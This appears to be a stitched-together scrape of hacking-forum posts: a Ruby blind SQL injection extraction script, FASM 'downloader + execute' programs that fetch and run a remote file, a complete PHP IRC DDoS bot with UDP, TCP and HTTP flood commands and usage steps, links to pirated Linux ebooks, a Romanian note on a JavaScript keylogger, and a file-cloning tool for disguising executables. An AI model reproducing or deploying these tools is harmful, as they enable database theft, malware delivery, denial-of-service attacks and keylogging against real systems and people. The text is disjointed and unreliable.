num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),12,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),13,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),14,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),15,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),16,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),17,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),18,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),19,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),20,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),21,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end res=String.new res << "#{num}, " lon1=lon2 num="0" while lon1 == lon2 num=num.succ url="#{ext}+and+ascii(substring((SELECT+#{col}+from+#{tab}+where+id=1),22,1))=#{num}" http= Net::HTTP.new(host) corp1=http.get("#{url}") corp1=corp1.body lon1=corp1.length end

;Simple Downloader + Execute (1.50kb compiled) ;by iNs ;activespy.org include 'win32ax.inc' .code inizio: invoke URLDownloadToFile,NULL,"http://www.site.com/filetodownload.ext","C:\downloaded.txt",NULL,NULL ;download file invoke ShellExecute,0,0,"C:\downloaded.txt",0,0,SW_SHOW ;run downloaded file invoke ExitProcess,0 .end inizio Download file in TempPath (2kb compiled) : ;Simple Downloader + Execute ;Save file in TempPath ; by iNs ; activespy.org include 'win32ax.inc' .data TmpName db 'new.txt',0 Tmpdir rb 256d ;256chrs .code inizio: invoke GetTempPath,Tmpdir,Tmpdir ;get temppath invoke lstrcat,Tmpdir,TmpName ;append invoke lstrcpy,TmpName,Tmpdir ;copy invoke URLDownloadToFile,NULL,"http://www.site.org/a.txt",TmpName,NULL,NULL ;download file in temppath invoke ShellExecute,0,0,TmpName,0,0,SW_SHOW ;run downloaded file invoke Sleep,3000 ;sleep 3 seconds invoke ExitProcess,0 ;quit .end inizio

Use: - Open mIRC (download: mirc.com) - Upload php_ddos_bot.php to your web server - Bot will join #yourchannel - PM the bot saying "ddos-udp IPHERE" - Enjoy. <?php /* PHP DDoS Bot Version 1.0 */ $server="1.3.3.7"; $Port="6667"; $nick="bot-";$willekeurig; $willekeurig=mt_rand(0,3); $nicknummer=mt_rand(100000,999999); $Channel="#WauShare"; $Channelpass="ddos"; $msg="Farewell."; set_time_limit(0); $loop = 0; $verbonden = 0; $verbinden = fsockopen($server, $Port); while ($read = fgets($verbinden,512)) { $read = str_replace("\n","",$read); $read = str_replace("\r","",$read); $read2 = explode(" ",$read); if ($loop == 0) { fputs($verbinden,"nick $nick$nicknummer\n\n"); fputs($verbinden,"USER cybercrime 0 * :woopie\n\n"); } if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); } if ($read2[1] == 251) { fputs($verbinden,"join $Channel $Channelpass\n"); $verbonden++; } if (eregi("bot-op",$read)) { fputs($verbinden,"mode $Channel +o $read2[4]\n"); } if (eregi("bot-deop",$read)) { fputs($verbinden,"mode $Channel -o $read2[4]\n"); } if (eregi("bot-quit",$read)) { fputs($verbinden,"quit :$msg\n\n"); break; } if (eregi("bot-join",$read)) { fputs($verbinden,"join $read2[4]\n"); } if (eregi("bot-part",$read)) { fputs($verbinden,"part $read2[4]\n"); } if (eregi("ddos-udp",$read)) { fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n"); $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30); if (!$fp) { //echo "$errstr ($errno)<br>\n"; //troep exit; } else { $char = "a"; for($a = 0; $a < 9999999999999; $a++) $data = $data.$char; if(fputs ($fp, $data) ) fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n"); else fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n"); } } if (eregi("ddos-tcp",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n"); $server = $read2[4]; $Port = $read2[5]; for($sockets = 0; $sockets < $read2[6]; $sockets++) { $verbinden = fsockopen($server, $Port); } } if (eregi("ddos-http",$read)) { fputs($verbinden,"part $read2[4]\n"); fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n"); $Webserver = $read2[4]; $Port = $read2[5]; $Aanvraag = "GET / HTTP/1.1\r\n"; $Aanvraag .= "Accept: */*\r\n"; $Aanvraag .= "Accept-Language: nl\r\n"; $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n"; $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"; $Aanvraag .= "Host: $read2[4]\r\n"; $Aanvraag .= "Connection: Keep-Alive\r\n\r\n"; for($Aantal = 0; $Aantal < $read2[6]; $Aantal++) { $DoS = fsockopen($Webserver, $Port); fwrite($DoS, $Aanvraag); fclose($DoS); } } $loop++; } ?>

Ubuntu on a Dime: The Path to Low-Cost Computing Paperback: 280 pages Publisher: Apress; 1 edition (June 8, 2009) Language: English ISBN-10: 1430219726 ISBN-13: 978-1430219729 Format: PDF Description: You know that Ubuntu software costs nothing. Now you want the PC system that costs as little as possible and runs Ubuntu and OS applications without complaints and calls to tech support. So you spend your hard–earned dollars on the hardware only and have your own optimized Ubuntu PC. This is the book that will show you how to get what you need without wreaking havoc on your finances. Put together the parts to make a great work computer for little cost. Packed with the practical, hands–on guidance and technical know–how that you’ve come to expect from Apress, Ubuntu on a Dime takes you on a tour of the very best, but low–cost hardware, while only using zero–cost software in each of the many categories that matter to the typical PC user. You’ll learn how to find the best and cheapest hardware, and how to put it together to make a working PC. Learn to edit photos on the Internet without having to install any software at all. Find out where to get a free office suite for word processing and spreadsheet work. Whatever your need, James Kelly, best–selling technology author, guides you through the exciting and often confusing world of zero–cost computing. This book Takes you step–by–step through a PC build Tells you what you need to install to have a fantastic work computer without spending a dime Saves you money by showing you how to meet your computing needs Saves you time by pointing you directly to the best free software Saves you work by illustrating the most commonly performed tasks with each zero–cost software Gives you choices and the ability to make your own decisions for your own needs and requirements Before you go buy that $900 dollar computer and that $400 office suite—or worse, before you “borrow” it from work—stop! Let this inexpensive book show you how to save hundreds of dollars in expensive software, and never depend on the big PC providers and their tech support again. Learn all about cheap, but fast hardware, find out about the free tools that the digerati use to make their lives better, and stop paying out the nose. Don't spend a dime! What you’ll learn Source, buy, and put together the best hardware to make a cheap PC optimized for Ubuntu Linux. Find and install the best zero–cost software available. Learn about software as a service and take advantage of photo editing, calendaring, e-mail, and other functionality delivered at no cost via the Web. Harness the power of OpenOffice and Google Apps for your word processing, spreadsheet, presentation needs. Communicate with your friends through zero–cost voice calls, e-mail, and instant–messaging. Establish a presence on the Web through blogs and social networking sites such as Facebook. Download: http://www.file2box.com/htebxx7uuuiy Ubuntu Linux Secrets Paperback: 840 pages Publisher: Wiley (April 13, 2009) Language: English ISBN-10: 0470395087 ISBN-13: 978-0470395080 Format: PDF Description: The everyday Linux user can easily get overwhelmed by the complexity of the new software that exists when creating an Ubuntu system. This book covers the basics of creating a new system from scratch and explains what software is installed. You’ll take a tour of installing the Ubuntu Linux distribution system in most environments, including nontraditional situations such as dual-boot and text-based installations. Plus, clear explanations of each of the installed applications show you how to get the most out of each application, rather than simply using them as they exist. Download: http://www.file2box.com/e2rgzswf67ii Ubuntu Pocket Guide and Reference: A concise companion for day-to-day Ubuntu use Paperback: 166 pages Publisher: CreateSpace (January 19, 2009) Language: English ISBN-10: 1440478295 ISBN-13: 978-1440478291 Format: PDF Description: Ubuntu Pocket Guide and Reference is a compact yet comprehensive guide for everyday Ubuntu use, written by the award-winning and best-selling Ubuntu author Keir Thomas. First, you'll learn about installation--getting Ubuntu onto your computer--after which you'll learn how to configure your computer's hardware. Following this, you'll be introduced to the Ubuntu desktop, and the tricks and techniques of efficient day-to-day usage. The book then describes the highways of the Ubuntu filesystem, and gives a full run-down of the Ubuntu file manager. Next, the command-line is tackled in-depth, after which software management is explained. Finally, system security is described. Appendixes provide a glossary, and a guide to technical documentation. Written for anybody switching to Ubuntu, particularly Windows users, Ubuntu Pocket Guide and Reference assumes zero Linux knowledge and conveys expert knowledge. Download: http://uploading.com/files/EKSFHYNM/9781440478291-1440478295.rar.html Pro Ubuntu Server Administration Paperback: 424 pages Publisher: Apress; 1 edition (December 2, 2008) Language: English ISBN-10: 1430216220 ISBN-13: 978-1430216223 Format: PDF Description: Pro Ubuntu Server Administration teaches you advanced Ubuntu system building. After reading this book, you will be able to manage anything from simple file servers to multiple virtual servers to high–availability clusters. This is the capstone volume of the Apress Ubuntu trilogy that includes Beginning Ubuntu Linux, Third Edition and Beginning Ubuntu Server LTS Administration: From Novice to Professional, Second Edition. You will be able to make Ubuntu technology shine in a Fortune–500 environment and let Ubuntu server become the backbone of your infrastructure. Topics covered include Performance monitoring and optimization High–availability clustering Advanced LDAP integrated networking What you’ll learn Monitor Ubuntu Server software and the hardware it is running on. Make Ubuntu Server fly by careful optimization. Learn how to craft high–availability clusters. Ease your way into large–scale LDAP networking. Acquire the skills to adjust Ubuntu Server to the security needs of a Fortune–500 environment. Run your own Ubuntu application server. Download: http://uploading.com/files/9SAV2IQS/9781430216223-1430216220.rar.html Ubuntu Linux Toolbox: 1000+ Commands for Ubuntu and Debian Power Users Publisher: Wiley Language: English ISBN: 0470082933 Paperback: 332 pages Data: November 28, 2007 Format: PDF Description: Aimed squarely at aspiring Linux power users and professional administrators, the Ubuntu Linux Toolbox offers more than 1000 examples of useful Linux command lines. This compact, handy reference is made to carry with you, whether you are maintaining hundreds of Linux systems or just want to dig beneath the surface of your Ubuntu desktop system. This is the Linux reference book you need to step up to the next level. Download: http://www.paid4share.net/file/4056/0470082933-rar.html Linux Bible 2009 Edition: Boot up Ubuntu, Fedora, KNOPPIX, Debian, openSUSE, and more Paperback: 888 pages Publisher: Wiley; Pap/Dvdr/C edition (January 14, 2009) Language: English ISBN-10: 0470373679 ISBN-13: 978-0470373675 Format: PDF Description: As the ultimate resource on the basics of the Linux desktops, servers, and programming tools, this book is written by the ultimate author on all things Linux. This transition resource is ideal if you are making the move from Windows or Macintosh to using Linux as your desktop system, and explains the Linux technology, offers detailed installation instructions, and includes step-by-step descriptions of key desktop and server components. You’ll relish the in-depth descriptions that will help you choose the best Linux distribution to suit your needs. Download: http://www.file2box.com/u6bkgeldn72x Pro Linux System Administration Paperback: 1080 pages Publisher: Apress; 1 edition (June 22, 2009) Language: English ISBN-10: 1430219122 ISBN-13: 978-1430219125 Format: PDF Description: We can all be Linux experts, provided we invest the time in learning the craft of Linux administration. Pro Linux System Administration makes it easy for small to medium–sized businesses to enter the world of zero–cost software running on Linux and covers all the distros you might want to use, including Red Hat, Ubuntu, Debian, and CentOS. Authors, and systems infrastructure experts James Turnbull, Peter Lieverdink, and Dennis Matotek take a layered, component–based approach to open source business systems, while training system administrators as the builders of business infrastructure. If you want to implement a SOHO or SMB Linux infrastructure, Pro Linux System Administration clearly demonstrates everything you need. You’ll find this book also provides a solid framework to move forward and expand your business and associated IT capabilities, and you’ll benefit from the expertise and experienced guidance of the authors. Pro Linux System Administration covers An introduction to using Linux and free and open source software to cheaply and efficiently manage your business A layered model that allows your infrastructure to grow with your business Easy and simple–to–understand instructions including configurations, examples, and extensive real–world hints and tips Download: http://www.file2box.com/0i51y2fm5xur

Nu cred, incearca si tu mai multe chestii: Pune html-ul intr-un iframe si incearca sa scrii in pagina cu iframe sau altele... Nu am testat.

Logic. Keypress-urile trebuie sa le primeasca browserul, js-ul captureaza acestea si le trimite prin AJAX la PHP loggerul care le scrie in fisier.

Blowfish: http://www.2shared.com/file/7104480/65a1678f/clsBlowfish.html DES: http://www.2shared.com/file/7104489/1c7ddf2b/clsDES.html Gost: http://www.2shared.com/file/7104491/bbd6658/clsGost.html RC4: http://www.2shared.com/file/7104496/95d9f3fb/clsRC4.html Rijndael: http://www.2shared.com/file/7104500/acba87b0/clsRijndael.html Serpent: http://www.2shared.com/file/7104509/d5663f14/clsSerpent.html Skipjack: http://www.2shared.com/file/7104514/b2cc72e8/clsSkipjack.html TEA: http://www.2shared.com/file/7104518/bb7a3ec3/clsTEA.html Twofish: http://www.2shared.com/file/7104521/e98bd5a4/clsTwofish.html + Huffman ( Compression algorithm ): http://www.2shared.com/file/7104536/6ef47146/clsHuffman.html Hash algorithms: MD5: http://www.2shared.com/file/7104551/a6ca4363/clsMD5.html SHA: http://www.2shared.com/file/7104557/4fa9e656/clsSHA.html SHA256: http://www.2shared.com/file/7104554/d6a0b7ec/clsSHA256.html ALL: http://www.a1vbcode.com/download.asp?ID=1438

File Cloner v1.0 Copy from one file to another: - Version Info - Icon - File Size (only take result when source size is bigger than dest. file size) - Date/time of last modification If you find any bug please report it to me! Tested on MS Windows XP and Windows 2003 Server. I am waiting for testing and comments. Sample pictures: - before clone: -after clone: Download: http://mo4x.ovh.org/file_cloner.zip Mirror: http://www.2shared.com/file/7104365/8e07a80b/file_cloner.html Regards, mo4x